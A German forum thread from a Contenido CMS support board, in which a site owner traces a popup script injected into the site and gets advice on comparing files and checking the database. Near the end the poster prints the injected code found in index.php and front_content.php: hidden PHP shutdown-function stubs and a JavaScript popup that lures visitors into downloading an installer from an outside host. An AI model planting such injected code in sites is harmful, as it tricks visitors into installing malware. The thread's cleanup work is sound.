Hallo!
Au einer 4.8.7 Installation hat sich vor der Doctype ein JS eingeschlichen, dass ein Popup mit ominösem Link offeriert.
Ich nehme an, mit einem Update auf die neueste Installation müsste dies zu beseitigen sein, oder?
Allerdings dachte ich, ich müsste dies auch per Hand rausfinden und entfernen können. Ich kann aber leider nichts finden.
Jetzt frage ich mich wo sich das Ding eingenistet hat, es muss ja in irgedneinem include stecken.
Insofern müsste eigentlich auch ein überspielen der Orginal-Dateien reichen, oder?
Danke!
Hack: JS vor Doctpye
Re: Hack: JS vor Doctpye
Hallo!
Entweder war die Frage vielleicht zu doof oder die Antwort klar oder eine Suche im Forum bringt die Antwort.
Was trifft zu?
Entweder war die Frage vielleicht zu doof oder die Antwort klar oder eine Suche im Forum bringt die Antwort.
Was trifft zu?
Re: Hack: JS vor Doctpye
Zutreffend ist vermutlich, dass niemand eine Ahnung hat. Tatsächlich kann sich irgendwo ein Link finden. Mit irgendwo ist die Datenbank sowie das Dateisystem gemeint. Wenn du noch einen Kopie hast, mit der das nicht auftritt, würde ich zunächst einmal einen Abgleich des Dateisystems vornehmen um auszuschliessend, dass das Skript dort liegt. Dann - wenn es dort nicht war - muss die DB unter die Lupe genommen werden. Das ist allerdings etwas schwieriger, da die Daten zum Teil urlencodiert vorliegen. Was natürlich die Suche erschwert.
aitsu.org :: schnell - flexibel - komfortabel :: Version 2.2.0 (since June 22, 2011) (jetzt mit dual license GPL/kommerziell)
Re: Hack: JS vor Doctpye
Für den ersten Teil (also die Suche im Dateisystem) kann es zum Beispiel auch hilfreich sein, ein Tool wie WinMerge zu verwenden, das Dateien/Verzeichnisse vergleichen kann. Dazu einfach die infizierten Dateien vom Webserver runterladen (hierbei kann evtl. ein lokaler Vierenscanner Alarm schlagen) und diese mit einer Originalversion von Contenido vergleichen lassen (Achtung: gleiche Versionen verwenden!). Damit kannst du rausfinden, welche Dateien alles infiziert worden sind. Die spezifischen Verzeichnisse wie Mandantenverzeichnis, cache, etc. kann man damit natürlich nicht überprüfen.
Da eine inifizierte Datei aber nicht immer die Ursache sein muss, sondern auch von einer anderen Datei infiziert worden sein kann, ist es (wie kummer schon sagte) sicherer, einen Komplettaustausch der Dateien gegen eine (hoffentlich bestehendes Backup) vorzunehmen. Der Vergleich gegen eine Originalversion bietet lediglich ein Bild des Ausmaßes der Infizierung an und hilft bei der Analyse.
Da eine inifizierte Datei aber nicht immer die Ursache sein muss, sondern auch von einer anderen Datei infiziert worden sein kann, ist es (wie kummer schon sagte) sicherer, einen Komplettaustausch der Dateien gegen eine (hoffentlich bestehendes Backup) vorzunehmen. Der Vergleich gegen eine Originalversion bietet lediglich ein Bild des Ausmaßes der Infizierung an und hilft bei der Analyse.
Immer mal ein Blick wert: Contenido Wiki ... auch schreibender Zugriff ist erlaubt!
Re: Hack: JS vor Doctpye
Vielen Dank für die Antworten. Bis dato habe ich nichts finden können.
Als nächstes werde ich mir die DB angucken.
Die Frage, ob ein Update das Problem beheben kann bleibt noch.
Danke!
Als nächstes werde ich mir die DB angucken.
Die Frage, ob ein Update das Problem beheben kann bleibt noch.
Danke!
Re: Hack: JS vor Doctpye
Ein Update kann das Problem natürlich nur dann beheben, wenn die Ursache irgendwo in den Dateien liegt. Die Datenbank-Felder, in denen anzuzeigender Inhalt steht (also auch potentieller Schadcode), werden natürlich nicht über- bzw. neugeschrieben.
Grundsätzlich bringt ein Update natürlich i.d.R. immer zusätzliche Sicherheit mit sich. Dabei ist jedoch zu beachten, dass man die alten Ordner vom Server löscht und nicht mit den neuen überschreibt, da sonst evtl. unsischere Dateien, die in der neuen Version nicht mehr vorhanden sind, nicht entfernt werden.
Grundsätzlich bringt ein Update natürlich i.d.R. immer zusätzliche Sicherheit mit sich.
Dabei ist jedoch zu beachten, dass man die alten Ordner vom Server löscht und nicht mit den neuen überschreibt, da sonst evtl. unsischere Dateien, die in der neuen Version nicht mehr vorhanden sind, nicht entfernt werden.Immer mal ein Blick wert: Contenido Wiki ... auch schreibender Zugriff ist erlaubt!
Re: Hack: JS vor Doctpye
Danke, hat sich erledigt! War mein Fehler. Habe die Files auf dem falschen Server gechecked...tse tse...
Das waren die Code-Zeilen, in der index.php (301er) und in der front_content.php.
Code: Alles auswählen
<?php @register_shutdown_function("__sfd1264002245__");function __sfd1264002245__() { global $__sdv1264002245__; if (!empty($__sdv1264002245__)) return; $__sdv1264002245__=1; echo <<<DOC__DOC
DOC__DOC;
} ?>
<?php @register_shutdown_function("__sfd1260864827__");function __sfd1260864827__() { global $__sdv1260864827__; if (!empty($__sdv1260864827__)) return; $__sdv1260864827__=1; echo <<<DOC__DOC
DOC__DOC;
} ?>Code: Alles auswählen
<?php error_reporting(0); echo "\n"; @__sfd1260864827__(); ?>
<?php error_reporting(0); echo "\n"; @__sfd1264002245__(); ?>Code: Alles auswählen
<script language="javascript" type="text/javascript">
if( confirm( 'Click "Start" to install ZZZ and access this website for free. You must agree to the terms of the End User License Agreement in order to continue.' ) ) {
window.open('http://www.xyz.biz/services/download.php?id=57&token=ca6fa6cbc770f191e2685d4f479f9390' , 'installwindow' );
}
</script>
Zuletzt geändert von andreasb am Sa 20. Mär 2010, 12:52, insgesamt 1-mal geändert.
Re: Hack: JS vor Doctpye
Mach doch bitte noch die böse URL im letzten Code-Schnipsel unkenntlich. Die bietet dir eine Install.exe an ... (Ergebnis von virustotal.com)
Die bietet dir eine Install.exe an ... (Ergebnis von virustotal.com)Immer mal ein Blick wert: Contenido Wiki ... auch schreibender Zugriff ist erlaubt!